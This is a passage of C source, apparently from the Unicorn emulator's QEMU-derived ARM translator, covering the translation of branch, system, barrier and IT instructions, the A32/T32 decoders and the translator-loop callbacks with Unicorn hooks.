trans_B(DisasContext *s, arg_i *a) { gen_jmp(s, read_pc(s) + a->imm); return true; } static bool trans_B_cond_thumb(DisasContext *s, arg_ci *a) { /* This has cond from encoding, required to be outside IT block. */ if (a->cond >= 0xe) { return false; } if (s->condexec_mask) { unallocated_encoding(s); return true; } arm_skip_unless(s, a->cond); gen_jmp(s, read_pc(s) + a->imm); return true; } static bool trans_BL(DisasContext *s, arg_i *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->base.pc_next | s->thumb); gen_jmp(s, read_pc(s) + a->imm); return true; } static bool trans_BLX_i(DisasContext *s, arg_BLX_i *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; /* For A32, ARCH(5) is checked near the start of the uncond block. 
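 * For T32, BLX<imm> switches to ARM state, so the target must be
 * word-aligned: bit 1 of the immediate must be zero (checked below)
 * and the base is Align(PC, 4), hence the "& ~3" on read_pc().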
*/ if (s->thumb && (a->imm & 2)) { return false; } tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->base.pc_next | s->thumb); tmp = tcg_const_i32(tcg_ctx, !s->thumb); store_cpu_field(tcg_ctx, tmp, thumb); gen_jmp(s, (read_pc(s) & ~3) + a->imm); return true; } static bool trans_BL_BLX_prefix(DisasContext *s, arg_BL_BLX_prefix *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; assert(!arm_dc_feature(s, ARM_FEATURE_THUMB2)); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], read_pc(s) + (a->imm << 12)); return true; } static bool trans_BL_suffix(DisasContext *s, arg_BL_suffix *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); assert(!arm_dc_feature(s, ARM_FEATURE_THUMB2)); tcg_gen_addi_i32(tcg_ctx, tmp, tcg_ctx->cpu_R[14], (a->imm << 1) | 1); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->base.pc_next | 1); gen_bx(s, tmp); return true; } static bool trans_BLX_suffix(DisasContext *s, arg_BLX_suffix *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; assert(!arm_dc_feature(s, ARM_FEATURE_THUMB2)); if (!ENABLE_ARCH_5) { return false; } tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_addi_i32(tcg_ctx, tmp, tcg_ctx->cpu_R[14], a->imm << 1); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xfffffffc); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->base.pc_next | 1); gen_bx(s, tmp); return true; } static bool op_tbranch(DisasContext *s, arg_tbranch *a, bool half) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 addr, tmp; tmp = load_reg(s, a->rm); if (half) { tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp); } addr = load_reg(s, a->rn); tcg_gen_add_i32(tcg_ctx, addr, addr, tmp); gen_aa32_ld_i32(s, tmp, addr, get_mem_index(s), half ? MO_UW | s->be_data : MO_UB); tcg_temp_free_i32(tcg_ctx, addr); tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp); tcg_gen_addi_i32(tcg_ctx, tmp, tmp, read_pc(s)); store_reg(s, 15, tmp); return true; } static bool trans_TBB(DisasContext *s, arg_tbranch *a) { return op_tbranch(s, a, false); } static bool trans_TBH(DisasContext *s, arg_tbranch *a) { return op_tbranch(s, a, true); } static bool trans_CBZ(DisasContext *s, arg_CBZ *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = load_reg(s, a->rn); arm_gen_condlabel(s); tcg_gen_brcondi_i32(tcg_ctx, a->nz ? TCG_COND_EQ : TCG_COND_NE, tmp, 0, s->condlabel); tcg_temp_free_i32(tcg_ctx, tmp); gen_jmp(s, read_pc(s) + a->imm); return true; } /* * Supervisor call - both T32 & A32 come here so we need to check * which mode we are in when checking for semihosting. */ static bool trans_SVC(DisasContext *s, arg_SVC *a) { const uint32_t semihost_imm = s->thumb ? 0xab : 0x123456; if (!arm_dc_feature(s, ARM_FEATURE_M) && false && // semihosting_enabled() && !IS_USER(s) && (a->imm == semihost_imm)) { gen_exception_internal_insn(s, s->pc_curr, EXCP_SEMIHOST); } else { gen_set_pc_im(s, s->base.pc_next); s->svc_imm = a->imm; s->base.is_jmp = DISAS_SWI; } return true; } /* * Unconditional system instructions */ static bool trans_RFE(DisasContext *s, arg_RFE *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static const int8_t pre_offset[4] = { /* DA */ -4, /* IA */ 0, /* DB */ -8, /* IB */ 4 }; static const int8_t post_offset[4] = { /* DA */ -8, /* IA */ 4, /* DB */ -4, /* IB */ 0 }; TCGv_i32 addr, t1, t2; if (!ENABLE_ARCH_6 || arm_dc_feature(s, ARM_FEATURE_M)) { return false; } if (IS_USER(s)) { unallocated_encoding(s); return true; } addr = load_reg(s, a->rn); tcg_gen_addi_i32(tcg_ctx, addr, addr, pre_offset[a->pu]); /* Load PC into tmp and CPSR into tmp2. 
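 * (t1/t2 below).  For example, "rfeia rn" (a->pu == 1) loads the
 * return PC from [rn] and the saved CPSR from [rn + 4]; the offset
 * tables above map the other three addressing modes onto the same
 * pair of loads.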
*/ t1 = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld32u(s, t1, addr, get_mem_index(s)); tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); t2 = tcg_temp_new_i32(tcg_ctx); gen_aa32_ld32u(s, t2, addr, get_mem_index(s)); if (a->w) { /* Base writeback. */ tcg_gen_addi_i32(tcg_ctx, addr, addr, post_offset[a->pu]); store_reg(s, a->rn, addr); } else { tcg_temp_free_i32(tcg_ctx, addr); } gen_rfe(s, t1, t2); return true; } static bool trans_SRS(DisasContext *s, arg_SRS *a) { if (!ENABLE_ARCH_6 || arm_dc_feature(s, ARM_FEATURE_M)) { return false; } gen_srs(s, a->mode, a->pu, a->w); return true; } static bool trans_CPS(DisasContext *s, arg_CPS *a) { uint32_t mask, val; if (!ENABLE_ARCH_6 || arm_dc_feature(s, ARM_FEATURE_M)) { return false; } if (IS_USER(s)) { /* Implemented as NOP in user mode. */ return true; } /* TODO: There are quite a lot of UNPREDICTABLE argument combinations. */ mask = val = 0; if (a->imod & 2) { if (a->A) { mask |= CPSR_A; } if (a->I) { mask |= CPSR_I; } if (a->F) { mask |= CPSR_F; } if (a->imod & 1) { val |= mask; } } if (a->M) { mask |= CPSR_M; val |= a->mode; } if (mask) { gen_set_psr_im(s, mask, 0, val); } return true; } static bool trans_CPS_v7m(DisasContext *s, arg_CPS_v7m *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp, addr, el; if (!arm_dc_feature(s, ARM_FEATURE_M)) { return false; } if (IS_USER(s)) { /* Implemented as NOP in user mode. */ return true; } tmp = tcg_const_i32(tcg_ctx, a->im); /* FAULTMASK */ if (a->F) { addr = tcg_const_i32(tcg_ctx, 19); gen_helper_v7m_msr(tcg_ctx, tcg_ctx->cpu_env, addr, tmp); tcg_temp_free_i32(tcg_ctx, addr); } /* PRIMASK */ if (a->I) { addr = tcg_const_i32(tcg_ctx, 16); gen_helper_v7m_msr(tcg_ctx, tcg_ctx->cpu_env, addr, tmp); tcg_temp_free_i32(tcg_ctx, addr); } el = tcg_const_i32(tcg_ctx, s->current_el); gen_helper_rebuild_hflags_m32(tcg_ctx, tcg_ctx->cpu_env, el); tcg_temp_free_i32(tcg_ctx, el); tcg_temp_free_i32(tcg_ctx, tmp); gen_lookup_tb(s); return true; } /* * Clear-Exclusive, Barriers */ static bool trans_CLREX(DisasContext *s, arg_CLREX *a) { if (s->thumb ? !ENABLE_ARCH_7 && !arm_dc_feature(s, ARM_FEATURE_M) : !ENABLE_ARCH_6K) { return false; } gen_clrex(s); return true; } static bool trans_DSB(DisasContext *s, arg_DSB *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!ENABLE_ARCH_7 && !arm_dc_feature(s, ARM_FEATURE_M)) { return false; } tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); return true; } static bool trans_DMB(DisasContext *s, arg_DMB *a) { return trans_DSB(s, NULL); } static bool trans_ISB(DisasContext *s, arg_ISB *a) { if (!ENABLE_ARCH_7 && !arm_dc_feature(s, ARM_FEATURE_M)) { return false; } /* * We need to break the TB after this insn to execute * self-modifying code correctly and also to take * any pending interrupts immediately. */ gen_goto_tb(s, 0, s->base.pc_next); return true; } static bool trans_SB(DisasContext *s, arg_SB *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!dc_isar_feature(aa32_sb, s)) { return false; } /* * TODO: There is no speculation barrier opcode * for TCG; MB and end the TB instead. */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); gen_goto_tb(s, 0, s->base.pc_next); return true; } static bool trans_SETEND(DisasContext *s, arg_SETEND *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!ENABLE_ARCH_6) { return false; } if (a->E != (s->be_data == MO_BE)) { gen_helper_setend(tcg_ctx, tcg_ctx->cpu_env); s->base.is_jmp = DISAS_UPDATE; } return true; } /* * Preload instructions * All are nops, contingent on the appropriate arch level. 
*/ static bool trans_PLD(DisasContext *s, arg_PLD *a) { return ENABLE_ARCH_5TE; } static bool trans_PLDW(DisasContext *s, arg_PLD *a) { return arm_dc_feature(s, ARM_FEATURE_V7MP); } static bool trans_PLI(DisasContext *s, arg_PLD *a) { return ENABLE_ARCH_7; } /* * If-then */ static bool trans_IT(DisasContext *s, arg_IT *a) { int cond_mask = a->cond_mask; /* * No actual code generated for this insn, just setup state. * * Combinations of firstcond and mask which set up an 0b1111 * condition are UNPREDICTABLE; we take the CONSTRAINED * UNPREDICTABLE choice to treat 0b1111 the same as 0b1110, * i.e. both meaning "execute always". */ s->condexec_cond = (cond_mask >> 4) & 0xe; s->condexec_mask = cond_mask & 0x1f; return true; } /* * Legacy decoder. */ static void disas_arm_insn(DisasContext *s, unsigned int insn) { unsigned int cond = insn >> 28; TCGContext *tcg_ctx = s->uc->tcg_ctx; /* M variants do not implement ARM mode; this must raise the INVSTATE * UsageFault exception. */ if (arm_dc_feature(s, ARM_FEATURE_M)) { gen_exception_insn(s, s->pc_curr, EXCP_INVSTATE, syn_uncategorized(), default_exception_el(s)); return; } // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(s->uc, UC_HOOK_CODE, s->pc_curr)) { // Sync PC in advance gen_set_pc_im(s, s->pc_curr); gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, s->uc, s->pc_curr); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } if (cond == 0xf) { /* In ARMv3 and v4 the NV condition is UNPREDICTABLE; we * choose to UNDEF. In ARMv5 and above the space is used * for miscellaneous unconditional instructions. */ ARCH(5); /* Unconditional instructions. */ /* TODO: Perhaps merge these into one decodetree output file. */ if (disas_a32_uncond(s, insn) || disas_vfp_uncond(s, insn)) { return; } /* fall back to legacy decoder */ if (((insn >> 25) & 7) == 1) { /* NEON Data processing. */ if (!arm_dc_feature(s, ARM_FEATURE_NEON)) { goto illegal_op; } if (disas_neon_data_insn(s, insn)) { goto illegal_op; } return; } if ((insn & 0x0f100000) == 0x04000000) { /* NEON load/store. */ if (!arm_dc_feature(s, ARM_FEATURE_NEON)) { goto illegal_op; } if (disas_neon_ls_insn(s, insn)) { goto illegal_op; } return; } if ((insn & 0x0e000f00) == 0x0c000100) { if (arm_dc_feature(s, ARM_FEATURE_IWMMXT)) { /* iWMMXt register transfer. */ if (extract32(s->c15_cpar, 1, 1)) { if (!disas_iwmmxt_insn(s, insn)) { return; } } } } else if ((insn & 0x0e000a00) == 0x0c000800 && arm_dc_feature(s, ARM_FEATURE_V8)) { if (disas_neon_insn_3same_ext(s, insn)) { goto illegal_op; } return; } else if ((insn & 0x0f000a00) == 0x0e000800 && arm_dc_feature(s, ARM_FEATURE_V8)) { if (disas_neon_insn_2reg_scalar_ext(s, insn)) { goto illegal_op; } return; } goto illegal_op; } if (cond != 0xe) { /* if not always execute, we generate a conditional jump to next instruction */ arm_skip_unless(s, cond); } /* TODO: Perhaps merge these into one decodetree output file. */ if (disas_a32(s, insn) || disas_vfp(s, insn)) { return; } /* fall back to legacy decoder */ switch ((insn >> 24) & 0xf) { case 0xc: case 0xd: case 0xe: if (((insn >> 8) & 0xe) == 10) { /* VFP, but failed disas_vfp. */ goto illegal_op; } if (disas_coproc_insn(s, insn)) { /* Coprocessor. */ goto illegal_op; } break; default: illegal_op: unallocated_encoding(s); break; } } static bool thumb_insn_is_16bit(DisasContext *s, uint32_t pc, uint32_t insn) { struct uc_struct *uc = s->uc; /* * Return true if this is a 16 bit instruction. We must be precise * about this (matching the decode). 
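 *
 * As a concrete check of the first test below: 0x4770 (BX lr) has
 * (insn >> 11) == 0x08, which is < 0x1d, so it is always 16-bit; the
 * BL/BLX prefix 0xf7ff has (insn >> 11) == 0x1e and falls through to
 * the 32-bit handling.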
*/ if ((insn >> 11) < 0x1d) { /* Definitely a 16-bit instruction */ return true; } /* Top five bits 0b11101 / 0b11110 / 0b11111 : this is the * first half of a 32-bit Thumb insn. Thumb-1 cores might * end up actually treating this as two 16-bit insns, though, * if it's half of a bl/blx pair that might span a page boundary. */ if (arm_dc_feature(s, ARM_FEATURE_THUMB2) || arm_dc_feature(s, ARM_FEATURE_M)) { /* Thumb2 cores (including all M profile ones) always treat * 32-bit insns as 32-bit. */ return false; } if ((insn >> 11) == 0x1e && pc - s->page_start < TARGET_PAGE_SIZE - 3) { /* 0b1111_0xxx_xxxx_xxxx : BL/BLX prefix, and the suffix * is not on the next page; we merge this into a 32-bit * insn. */ return false; } /* 0b1110_1xxx_xxxx_xxxx : BLX suffix (or UNDEF); * 0b1111_1xxx_xxxx_xxxx : BL suffix; * 0b1111_0xxx_xxxx_xxxx : BL/BLX prefix on the end of a page * -- handle as single 16 bit insn */ return true; } /* Translate a 32-bit thumb instruction. */ static void disas_thumb2_insn(DisasContext *s, uint32_t insn) { /* * ARMv6-M supports a limited subset of Thumb2 instructions. * Other Thumb1 architectures allow only 32-bit * combined BL/BLX prefix and suffix. */ if (arm_dc_feature(s, ARM_FEATURE_M) && !arm_dc_feature(s, ARM_FEATURE_V7)) { int i; bool found = false; static const uint32_t armv6m_insn[] = {0xf3808000 /* msr */, 0xf3b08040 /* dsb */, 0xf3b08050 /* dmb */, 0xf3b08060 /* isb */, 0xf3e08000 /* mrs */, 0xf000d000 /* bl */}; static const uint32_t armv6m_mask[] = {0xffe0d000, 0xfff0d0f0, 0xfff0d0f0, 0xfff0d0f0, 0xffe0d000, 0xf800d000}; for (i = 0; i < ARRAY_SIZE(armv6m_insn); i++) { if ((insn & armv6m_mask[i]) == armv6m_insn[i]) { found = true; break; } } if (!found) { goto illegal_op; } } else if ((insn & 0xf800e800) != 0xf000e800) { ARCH(6T2); } /* * TODO: Perhaps merge these into one decodetree output file. * Note disas_vfp is written for a32 with cond field in the * top nibble. The t32 encoding requires 0xe in the top nibble. */ if (disas_t32(s, insn) || disas_vfp_uncond(s, insn) || ((insn >> 28) == 0xe && disas_vfp(s, insn))) { return; } /* fall back to legacy decoder */ switch ((insn >> 25) & 0xf) { case 0: case 1: case 2: case 3: /* 16-bit instructions. Should never happen. */ abort(); case 6: case 7: case 14: case 15: /* Coprocessor. */ if (arm_dc_feature(s, ARM_FEATURE_M)) { /* 0b111x_11xx_xxxx_xxxx_xxxx_xxxx_xxxx_xxxx */ if (extract32(insn, 24, 2) == 3) { goto illegal_op; /* op0 = 0b11 : unallocated */ } if (((insn >> 8) & 0xe) == 10 && dc_isar_feature(aa32_fpsp_v2, s)) { /* FP, and the CPU supports it */ goto illegal_op; } else { /* All other insns: NOCP */ gen_exception_insn(s, s->pc_curr, EXCP_NOCP, syn_uncategorized(), default_exception_el(s)); } break; } if ((insn & 0xfe000a00) == 0xfc000800 && arm_dc_feature(s, ARM_FEATURE_V8)) { /* The Thumb2 and ARM encodings are identical. */ if (disas_neon_insn_3same_ext(s, insn)) { goto illegal_op; } } else if ((insn & 0xff000a00) == 0xfe000800 && arm_dc_feature(s, ARM_FEATURE_V8)) { /* The Thumb2 and ARM encodings are identical. */ if (disas_neon_insn_2reg_scalar_ext(s, insn)) { goto illegal_op; } } else if (((insn >> 24) & 3) == 3) { /* Translate into the equivalent ARM encoding. */ insn = (insn & 0xe2ffffff) | ((insn & (1 << 28)) >> 4) | (1 << 28); if (disas_neon_data_insn(s, insn)) { goto illegal_op; } } else if (((insn >> 8) & 0xe) == 10) { /* VFP, but failed disas_vfp. 
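 * (The ((insn >> 8) & 0xe) test clears the low bit of the coprocessor
 * number, so cp10 and cp11, which form the VFP/Neon register file,
 * both compare equal to 10 here.)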
*/ goto illegal_op; } else { if (insn & (1 << 28)) goto illegal_op; if (disas_coproc_insn(s, insn)) { goto illegal_op; } } break; case 12: if ((insn & 0x01100000) == 0x01000000) { if (disas_neon_ls_insn(s, insn)) { goto illegal_op; } break; } goto illegal_op; default: illegal_op: unallocated_encoding(s); } } static void disas_thumb_insn(DisasContext *s, uint32_t insn) { if (!disas_t16(s, insn)) { unallocated_encoding(s); } } static bool insn_crosses_page(CPUARMState *env, DisasContext *s) { /* Return true if the insn at dc->base.pc_next might cross a page boundary. * (False positives are OK, false negatives are not.) * We know this is a Thumb insn, and our caller ensures we are * only called if dc->base.pc_next is less than 4 bytes from the page * boundary, so we cross the page if the first 16 bits indicate * that this is a 32 bit insn. */ uint16_t insn = arm_lduw_code(env, s->base.pc_next, s->sctlr_b); return !thumb_insn_is_16bit(s, s->base.pc_next, insn); } static void arm_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = cs->uc; TCGContext *tcg_ctx = cs->uc->tcg_ctx; CPUARMState *env = cs->env_ptr; ARMCPU *cpu = env_archcpu(env); uint32_t tb_flags = dc->base.tb->flags; uint32_t condexec, core_mmu_idx; // unicorn handle dc->uc = uc; dc->isar = &cpu->isar; dc->condjmp = 0; dc->aarch64 = 0; /* If we are coming from secure EL0 in a system with a 32-bit EL3, then * there is no secure EL1, so we route exceptions to EL3. */ dc->secure_routed_to_el3 = arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3); dc->thumb = FIELD_EX32(tb_flags, TBFLAG_AM32, THUMB); dc->be_data = FIELD_EX32(tb_flags, TBFLAG_ANY, BE_DATA) ? MO_BE : MO_LE; condexec = FIELD_EX32(tb_flags, TBFLAG_AM32, CONDEXEC); dc->condexec_mask = (condexec & 0xf) << 1; dc->condexec_cond = condexec >> 4; core_mmu_idx = FIELD_EX32(tb_flags, TBFLAG_ANY, MMUIDX); dc->mmu_idx = core_to_arm_mmu_idx(env, core_mmu_idx); dc->current_el = arm_mmu_idx_to_el(dc->mmu_idx); dc->user = (dc->current_el == 0); dc->fp_excp_el = FIELD_EX32(tb_flags, TBFLAG_ANY, FPEXC_EL); if (arm_feature(env, ARM_FEATURE_M)) { dc->vfp_enabled = 1; dc->be_data = MO_TE; dc->v7m_handler_mode = FIELD_EX32(tb_flags, TBFLAG_M32, HANDLER); dc->v8m_secure = arm_feature(env, ARM_FEATURE_M_SECURITY) && regime_is_secure(env, dc->mmu_idx); dc->v8m_stackcheck = FIELD_EX32(tb_flags, TBFLAG_M32, STACKCHECK); dc->v8m_fpccr_s_wrong = FIELD_EX32(tb_flags, TBFLAG_M32, FPCCR_S_WRONG); dc->v7m_new_fp_ctxt_needed = FIELD_EX32(tb_flags, TBFLAG_M32, NEW_FP_CTXT_NEEDED); dc->v7m_lspact = FIELD_EX32(tb_flags, TBFLAG_M32, LSPACT); } else { dc->be_data = FIELD_EX32(tb_flags, TBFLAG_ANY, BE_DATA) ? MO_BE : MO_LE; dc->debug_target_el = FIELD_EX32(tb_flags, TBFLAG_ANY, DEBUG_TARGET_EL); dc->sctlr_b = FIELD_EX32(tb_flags, TBFLAG_A32, SCTLR_B); dc->hstr_active = FIELD_EX32(tb_flags, TBFLAG_A32, HSTR_ACTIVE); dc->ns = FIELD_EX32(tb_flags, TBFLAG_A32, NS); dc->vfp_enabled = FIELD_EX32(tb_flags, TBFLAG_A32, VFPEN); if (arm_feature(env, ARM_FEATURE_XSCALE)) { dc->c15_cpar = FIELD_EX32(tb_flags, TBFLAG_A32, XSCALE_CPAR); } else { dc->vec_len = FIELD_EX32(tb_flags, TBFLAG_A32, VECLEN); dc->vec_stride = FIELD_EX32(tb_flags, TBFLAG_A32, VECSTRIDE); } } dc->cp_regs = cpu->cp_regs; dc->features = env->features; /* Single step state. 
The code-generation logic here is: * SS_ACTIVE == 0: * generate code with no special handling for single-stepping (except * that anything that can make us go to SS_ACTIVE == 1 must end the TB; * this happens anyway because those changes are all system register or * PSTATE writes). * SS_ACTIVE == 1, PSTATE.SS == 1: (active-not-pending) * emit code for one insn * emit code to clear PSTATE.SS * emit code to generate software step exception for completed step * end TB (as usual for having generated an exception) * SS_ACTIVE == 1, PSTATE.SS == 0: (active-pending) * emit code to generate a software step exception * end the TB */ dc->ss_active = FIELD_EX32(tb_flags, TBFLAG_ANY, SS_ACTIVE); dc->pstate_ss = FIELD_EX32(tb_flags, TBFLAG_ANY, PSTATE_SS); dc->is_ldex = false; dc->page_start = dc->base.pc_first & TARGET_PAGE_MASK; /* If architectural single step active, limit to 1. */ if (is_singlestepping(dc)) { dc->base.max_insns = 1; } /* ARM is a fixed-length ISA. Bound the number of insns to execute to those left on the page. */ if (!dc->thumb) { #ifdef _MSC_VER int bound = (0 - (dc->base.pc_first | TARGET_PAGE_MASK)) / 4; #else int bound = -(dc->base.pc_first | TARGET_PAGE_MASK) / 4; #endif dc->base.max_insns = MIN(dc->base.max_insns, bound); } tcg_ctx->cpu_V0 = tcg_temp_new_i64(tcg_ctx); tcg_ctx->cpu_V1 = tcg_temp_new_i64(tcg_ctx); /* FIXME: cpu_M0 can probably be the same as cpu_V0. */ tcg_ctx->cpu_M0 = tcg_temp_new_i64(tcg_ctx); } static void arm_tr_tb_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; /* A note on handling of the condexec (IT) bits: * * We want to avoid the overhead of having to write the updated condexec * bits back to the CPUARMState for every instruction in an IT block. So: * (1) if the condexec bits are not already zero then we write * zero back into the CPUARMState now. This avoids complications trying * to do it at the end of the block. (For example if we don't do this * it's hard to identify whether we can safely skip writing condexec * at the end of the TB, which we definitely want to do for the case * where a TB doesn't do anything with the IT state at all.) * (2) if we are going to leave the TB then we call gen_set_condexec() * which will write the correct value into CPUARMState if zero is wrong. * This is done both for leaving the TB at the end, and for leaving * it because of an exception we know will happen, which is done in * gen_exception_insn(). The latter is necessary because we need to * leave the TB with the PC/IT state just prior to execution of the * instruction which caused the exception. * (3) if we leave the TB unexpectedly (eg a data abort on a load) * then the CPUARMState will be wrong and we need to reset it. * This is handled in the same way as restoration of the * PC in these situations; we save the value of the condexec bits * for each PC via tcg_gen_insn_start(), and restore_state_to_opc() * then uses this to restore them after an exception. * * Note that there are no instructions which can read the condexec * bits, and none which can write non-static values to them, so * we don't need to care about whether CPUARMState is correct in the * middle of a TB. */ /* Reset the conditional execution bits immediately. This avoids complications trying to do it at the end of the block. 
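 *
 * For reference, the per-insn value saved by arm_tr_insn_start() below is
 * (condexec_cond << 4) | (condexec_mask >> 1), the exact inverse of the
 * unpacking in arm_tr_init_disas_context() (mask = (bits & 0xf) << 1,
 * cond = bits >> 4); that is why restore_state_to_opc() can write data[1]
 * straight back into env->condexec_bits.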
*/ if (dc->condexec_mask || dc->condexec_cond) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, 0); store_cpu_field(tcg_ctx, tmp, condexec_bits); } } static void arm_tr_insn_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; tcg_gen_insn_start(tcg_ctx, dc->base.pc_next, (dc->condexec_cond << 4) | (dc->condexec_mask >> 1), 0); dc->insn_start = tcg_last_op(tcg_ctx); } static bool arm_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cpu, const CPUBreakpoint *bp) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (bp->flags & BP_CPU) { gen_set_condexec(dc); gen_set_pc_im(dc, dc->base.pc_next); gen_helper_check_breakpoints(tcg_ctx, tcg_ctx->cpu_env); /* End the TB early; it's likely not going to be executed */ dc->base.is_jmp = DISAS_TOO_MANY; } else { gen_exception_internal_insn(dc, dc->base.pc_next, EXCP_DEBUG); /* The address covered by the breakpoint must be included in [tb->pc, tb->pc + tb->size) in order for it to be properly cleared -- thus we increment the PC here so that the logic setting tb->size below does the right thing. */ /* TODO: Advance PC by correct instruction length to * avoid disassembler error messages */ dc->base.pc_next += 2; dc->base.is_jmp = DISAS_NORETURN; } return true; } static bool arm_pre_translate_insn(DisasContext *dc) { if (dc->ss_active && !dc->pstate_ss) { /* Singlestep state is Active-pending. * If we're in this state at the start of a TB then either * a) we just took an exception to an EL which is being debugged * and this is the first insn in the exception handler * b) debug exceptions were masked and we just unmasked them * without changing EL (eg by clearing PSTATE.D) * In either case we're going to take a swstep exception in the * "did not step an insn" case, and so the syndrome ISV and EX * bits should be zero. */ assert(dc->base.num_insns == 1); gen_swstep_exception(dc, 0, 0); dc->base.is_jmp = DISAS_NORETURN; return true; } return false; } static void arm_post_translate_insn(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (dc->condjmp && !dc->base.is_jmp) { gen_set_label(tcg_ctx, dc->condlabel); dc->condjmp = 0; } translator_loop_temp_check(&dc->base); } static void arm_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); CPUARMState *env = cpu->env_ptr; unsigned int insn; if (arm_pre_translate_insn(dc)) { return; } // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(dc->uc, dcbase->pc_next)) { // imitate WFI instruction to halt emulation dcbase->is_jmp = DISAS_WFI; } else { dc->pc_curr = dc->base.pc_next; insn = arm_ldl_code(env, dc->base.pc_next, dc->sctlr_b); dc->insn = insn; // Unicorn: // // If we get an error during fetching code, we have to skip the instruction decoding // to ensure the PC remains unchanged. // // This keeps the same behavior as Unicorn 1, though it is inconsistent with // the official Arm documentation. // // See discussion here: https://github.com/unicorn-engine/unicorn/issues/1536 if (dc->uc->invalid_error) { dcbase->is_jmp = DISAS_WFI; return; } dc->base.pc_next += 4; disas_arm_insn(dc, insn); arm_post_translate_insn(dc); /* ARM is a fixed-length ISA. We performed the cross-page check in init_disas_context by adjusting max_insns. 
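 *
 * As a worked example of that bound: with 4KiB pages, a TB starting at
 * pc_first == 0x8ff8 leaves -(0x8ff8 | TARGET_PAGE_MASK) == 8 bytes on
 * the page, so max_insns is capped at 2 A32 instructions.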
*/ } } static bool thumb_insn_is_unconditional(DisasContext *s, uint32_t insn) { /* Return true if this Thumb insn is always unconditional, * even inside an IT block. This is true of only a very few * instructions: BKPT, HLT, and SG. * * A larger class of instructions are UNPREDICTABLE if used * inside an IT block; we do not need to detect those here, because * what we do by default (perform the cc check and update the IT * bits state machine) is a permitted CONSTRAINED UNPREDICTABLE * choice for those situations. * * insn is either a 16-bit or a 32-bit instruction; the two are * distinguishable because for the 16-bit case the top 16 bits * are zeroes, and that isn't a valid 32-bit encoding. */ if ((insn & 0xffffff00) == 0xbe00) { /* BKPT */ return true; } if ((insn & 0xffffffc0) == 0xba80 && arm_dc_feature(s, ARM_FEATURE_V8) && !arm_dc_feature(s, ARM_FEATURE_M)) { /* HLT: v8A only. This is unconditional even when it is going to * UNDEF; see the v8A ARM ARM DDI0487B.a H3.3. * For v7 cores this was a plain old undefined encoding and so * honours its cc check. (We might be using the encoding as * a semihosting trap, but we don't change the cc check behaviour * on that account, because a debugger connected to a real v7A * core and emulating semihosting traps by catching the UNDEF * exception would also only see cases where the cc check passed. * No guest code should be trying to do a HLT semihosting trap * in an IT block anyway. */ return true; } if (insn == 0xe97fe97f && arm_dc_feature(s, ARM_FEATURE_V8) && arm_dc_feature(s, ARM_FEATURE_M)) { /* SG: v8M only */ return true; } return false; } static void thumb_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = dc->uc; TCGContext *tcg_ctx = uc->tcg_ctx; CPUARMState *env = cpu->env_ptr; uint32_t insn; bool is_16bit; uint32_t insn_size; if (arm_pre_translate_insn(dc)) { return; } // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(uc, dcbase->pc_next)) { // imitate WFI instruction to halt emulation dcbase->is_jmp = DISAS_WFI; return; } dc->pc_curr = dc->base.pc_next; insn = arm_lduw_code(env, dc->base.pc_next, dc->sctlr_b); is_16bit = thumb_insn_is_16bit(dc, dc->base.pc_next, insn); dc->base.pc_next += 2; if (!is_16bit) { uint32_t insn2 = arm_lduw_code(env, dc->base.pc_next, dc->sctlr_b); insn = insn << 16 | insn2; dc->base.pc_next += 2; } dc->insn = insn; if (dc->condexec_mask && !thumb_insn_is_unconditional(dc, insn)) { uint32_t cond = dc->condexec_cond; /* * Conditionally skip the insn. Note that both 0xe and 0xf mean * "always"; 0xf is not "never". */ if (cond < 0x0e) { arm_skip_unless(dc, cond); } } // Unicorn: // We can't stop in the middle of 